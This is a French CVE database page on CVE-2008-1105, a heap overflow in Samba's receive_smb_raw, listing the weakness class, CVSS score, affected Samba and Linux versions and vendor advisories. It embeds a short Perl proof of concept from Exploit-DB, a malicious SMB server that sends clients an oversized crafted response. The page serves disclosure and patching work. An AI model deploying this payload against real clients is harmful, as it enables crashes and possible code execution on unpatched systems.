CVE-2008-1105 : Détail

CVE-2008-1105

Overflow
97.02%V3
Network
2008-05-29 14:00 +00:00
2018-10-11 17:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Heap-based buffer overflow in the receive_smb_raw function in util/sock.c in Samba 3.0.0 through 3.0.29 allows remote attackers to execute arbitrary code via a crafted SMB response.

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5712

Date de publication : 2008-05-31 22:00 +00:00
Auteur : Guido Landi
EDB Vérifié : Yes

#!/usr/bin/perl # 06/01/2008 - k`sOSe # # ~ # smbclient //localhost/w00t # *** glibc detected *** smbclient: free(): invalid next size (fast): 0x0823c2d8 *** # use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '445', Listen => 1, Reuse => 1) || die($!); while(my $csock = $sock->accept()) { print $csock "\x00" . "\x01\xff\xff" . "\x41" x 131071; } # milw0rm.com [2008-06-01]

Products Mentioned

Configuraton 0

Samba>>Samba >> Version From (including) 3.0.0 To (including) 3.0.29

Configuraton 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 7.04

Canonical>>Ubuntu_linux >> Version 7.10

Canonical>>Ubuntu_linux >> Version 8.04

Configuraton 0

Debian>>Debian_linux >> Version 4.0

References

http://www.redhat.com/support/errata/RHSA-2008-0288.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/30478
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30396
Tags : third-party-advisory, x_refsource_SECUNIA
http://support.apple.com/kb/HT2163
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/30489
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2008/2639
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1020123
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/30835
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30736
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30385
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31911
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2008/1908
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2008-0290.html
Tags : vendor-advisory, x_refsource_REDHAT
https://www.exploit-db.com/exploits/5712
Tags : exploit, x_refsource_EXPLOIT-DB
http://sunsolve.sun.com/search/document.do?assetkey=1-26-249086-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/30449
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2008:108
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/30802
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33696
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30442
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30543
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30228
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-617-2
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.ubuntu.com/usn/usn-617-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.securityfocus.com/bid/31255
Tags : vdb-entry, x_refsource_BID
http://security.gentoo.org/glsa/glsa-200805-23.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.vupen.com/english/advisories/2008/1681
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2008-0289.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/31246
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/29404
Tags : vdb-entry, x_refsource_BID
http://www.debian.org/security/2008/dsa-1590
Tags : vendor-advisory, x_refsource_DEBIAN
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.